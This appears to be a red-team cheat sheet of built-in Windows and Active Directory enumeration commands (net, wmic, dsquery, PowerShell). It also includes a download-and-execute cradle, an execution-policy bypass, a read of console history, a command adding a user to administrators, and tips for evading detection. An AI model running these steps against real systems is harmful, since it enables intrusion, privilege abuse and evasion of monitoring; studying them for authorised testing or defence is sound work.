Living Off the Land Enumeration

OS Context

Basic enum commands


Command	Result
`hostname`	Prints the PC's Name
`[System.Environment]::OSVersion.Version`	Prints out the OS version and revision level
`wmic qfe get Caption,Description,HotFixID,InstalledOn`	Prints the patches and hotfixes applied to the host
`ipconfig /all`	Prints out network adapter state and configurations
`set`	Displays a list of environment variables for the current session (ran from CMD-prompt)
`echo %USERDOMAIN%`	Displays the domain name to which the host belongs (ran from CMD-prompt)
`echo %logonserver%`	Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

systeminfo

Powershell

Get-Module

Get-ExecutionPolicy -List

Set-ExecutionPolicy Bypass -Scope Process

Get-ChildItem Env: | ft Key,Value

Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

OPSEC Techniques

powershell.exe -version 2

Checking Defenses

netsh advfirewall show allprofiles

sc query windefend

Get-MpComputerStatus

Other users on host?

qwinsta

Network Information

arp -a
ipconfig /all
route print

note

Using arp -a and route print will not only benefit in enumerating AD environments, but will also assist us in identifying opportunities to pivot to different network segments in any environment.

Windows Management Instrumentation (WMI)

wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

wmic process list /format:list

wmic ntdomain list /format:list

wmic useraccount list /format:list

wmic group list /format:list

wmic sysaccount list /format:list

https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4

Net Commands

net accounts

net accounts /domain

net group /domain

net group "Domain Admins" /domain

net group "domain computers" /domain

net group "Domain Controllers" /domain

net group <domain_group_name> /domain

net groups /domain

List of domain groups

net localgroup

net localgroup administrators /domain

net localgroup Administrators

net localgroup administrators [username] /add

net share

net user <ACCOUNT_NAME> /domain

net user /domain

net user %username%

Information about the current user

net use x: \computer\share

net view

net view /all /domain[:domainname]

Shares on the domains

net view /domain

OPSEC

Typing net1 instead of net will execute the same functions without the potential trigger from the net string.

Dsquery

C:\Windows\System32\dsquery.dll

note

Elevated privs required for dsquery

dsquery user

dsquery computer

We can use a dsquery wildcard search to view all objects in an OU, for example.

dsquery * "CN=Users,DC=DOMAIN,DC=LOCAL"

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName